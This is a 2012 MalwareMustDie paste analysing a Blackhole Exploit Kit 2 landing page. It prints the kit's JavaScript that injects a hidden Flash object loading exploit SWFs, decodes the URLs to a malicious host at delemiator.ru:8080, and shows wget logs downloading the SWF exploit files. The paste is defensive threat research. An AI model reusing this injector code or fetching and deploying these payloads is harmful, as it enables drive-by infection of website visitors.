SHARE
TWEET

#MalwareMustDie FLUSH3 - PluginDetect 0.7.9. Nov 25, 2012

MalwareMustDie Nov 25th, 2012 194 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. =======================================
  2. GET THE SWF EXPLOITER & INFECTOR
  3. TEHRE ARE 2(TWO) FUNCTIONS RELATED...
  4. #MalwareMustDie | @unixfreaxjp ~]$ date
  5. Sun Nov 25 20:50:32 JST 2012
  6. =======================================
  7.  
  8. //There is also two swf downloader function :
  9.  
  10.  function getCN()
  11.  {
  12.    return "/forum/links/column.php?seyjjv="+x("c833f")+"&apvpjz="+x("cvwyb")+"&mzb=2v:1k:1m:32:33:1k:1k:31:1j:1o&vsoyj=igoe"
  13.  }
  14.  
  15. //let's crack the url provided in the function by the above method, result is the below download of SWF Exploit file :
  16.  
  17. http://delemiator.ru:8080/forum/links/column.php?seyjjv=30:1n:1i:1i:33&apvpjz=30:3j:3k:3m:2w&mzb=2v:1k:1m:32:33:1k:1k:31:1j:1o&vsoyj=igoe
  18.  
  19. // download:
  20.  
  21. --17:24:41--  http://delemiator.ru:8080/forum/links/column.php?seyjjv=30:1n:1i:1i:33&apvpjz=30:3j:3k:3m:2w&mzb=2v:1k:1m:32:33:1k:1k:31:1j:1o&vsoyj=igoe
  22.            => `column.php@seyjjv=30%3A1n%3A1i%3A1i%3A33&apvpjz=30%3A3j%3A3k%3A3m%3A2w&mzb=2v%3A1k%3A1m%3A32%3A33%3A1k%3A1k%3A31%3A1j%3A1o&vsoyj=igoe'
  23. Resolving delemiator.ru... 208.87.243.131, 202.180.221.186, 203.80.16.81
  24. Connecting to delemiator.ru|208.87.243.131|:8080... connected.
  25. HTTP request sent, awaiting response... 200 OK
  26. Length: 5,969 (5.8K) [text/html]
  27. 17:24:43 (128.15 MB/s) - `column.php@seyjjv=30%3A1n%3A1i%3A1i%3A33&apvpjz=30%3A3j%3A3k%3A3m%3A2w&mzb=2v%3A1k%3A1m%3A32%3A33%3A1k%3A1k%3A31%3A1j%3A1o&vsoyj=igoe' saved [5969/5969]
  28.  
  29.  
  30. // Here is another one ff2() to bring you to another download url, see below decoding process..
  31.  
  32. function ff2()
  33.  {
  34.    var oSpan=document.createElement("span");
  35.    var url="/forum/links/column.php?cha="+x("c833f")+"&oqbqt="+x("yxjk")+"&hahphpgk=2v:1k:1m:32:33:1k:1k:31:1j:1o&pdwgygwj=liczqqdo";
  36.    oSpan.innerHTML="<object classid='clsid:d27cdb6e-ae6d-11cf-96b8-444553540000' width=10 height=10 id='swf_id'>
  37.   <param name='movie' value='"+url+"' />
  38.   <param name='allowScriptAccess' value='always' />
  39.   <param name='Play' value='0' />
  40.   <embed src='"+url+"' id='swf_id' name='swf_id' allowScriptAccess='always' type='application/x-shockwave-flash' width='10' height='10'>
  41.   </embed></object>";
  42.    document.body.appendChild(oSpan);
  43.  }
  44.  
  45. // focus into this: var url="/forum/links/column.php?cha="+x("c833f")+"&oqbqt="+x("yxjk")+"&hahphpgk=2v:1k:1m:32:33:1k:1k:31:1j:1o&pdwgygwj=liczqqdo";
  46. // with "yxjk" is "3m:3l:37:38" we get the download url below, to download another
  47.  
  48. http://delemiator.ru:8080/forum/links/column.php?cha=30:1n:1i:1i:33&oqbqt=3m:3l:37:38&hahphpgk=2v:1k:1m:32:33:1k:1k:31:1j:1o&pdwgygwj=liczqqdo
  49.  
  50. --17:35:50--  http://delemiator.ru:8080/forum/links/column.php?cha=30:1n:1i:1i:33&oqbqt=3m:3l:37:38&hahphpgk=2v:1k:1m:32:33:1k:1k:31:1j:1o&pdwgygwj=liczqqdo
  51.            => `column.php@cha=30%3A1n%3A1i%3A1i%3A33&oqbqt=3m%3A3l%3A37%3A38&hahphpgk=2v%3A1k%3A1m%3A32%3A33%3A1k%3A1k%3A31%3A1j%3A1o&pdwgygwj=liczqqdo'
  52. Resolving delemiator.ru... 208.87.243.131, 202.180.221.186, 203.80.16.81
  53. Connecting to delemiator.ru|208.87.243.131|:8080... connected.
  54. HTTP request sent, awaiting response... 200 OK
  55. Length: 3,043 (3.0K) [text/html]
  56. 17:35:52 (87.29 MB/s) - `column.php@cha=30%3A1n%3A1i%3A1i%3A33&oqbqt=3m%3A3l%3A37%3A38&hahphpgk=2v%3A1k%3A1m%3A32%3A33%3A1k%3A1k%3A31%3A1j%3A1o&pdwgygwj=liczqqdo' saved [3043/3043]
  57.  
  58. // The further hack into this BHEK2 infector show us that the static path of these two SWF
  59. // infectors also exists as per below links with download PoC:
  60.  
  61. --17:39:41--  http://delemiator.ru:8080/forum/data/field.swf
  62.            => `field.swf'
  63. Resolving delemiator.ru... 202.180.221.186, 203.80.16.81, 208.87.243.131
  64. Connecting to delemiator.ru|202.180.221.186|:8080... connected.
  65. HTTP request sent, awaiting response... 200 OK
  66. Length: 3,043 (3.0K) [application/x-shockwave-flash]
  67. 17:39:44 (89.55 MB/s) - `field.swf' saved [3043/3043]
  68.  
  69.  
  70. --17:39:54--  http://delemiator.ru:8080/forum/data/score.swf
  71.            => `score.swf'
  72. Resolving delemiator.ru... 202.180.221.186, 203.80.16.81, 208.87.243.131
  73. Connecting to delemiator.ru|202.180.221.186|:8080... connected.
  74. HTTP request sent, awaiting response... 200 OK
  75. Length: 5,969 (5.8K) [application/x-shockwave-flash]
  76. 17:39:56 (42.54 MB/s) - `score.swf' saved [5969/5969]
  77.  
  78. #MalwareMustDie!
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!
 
Top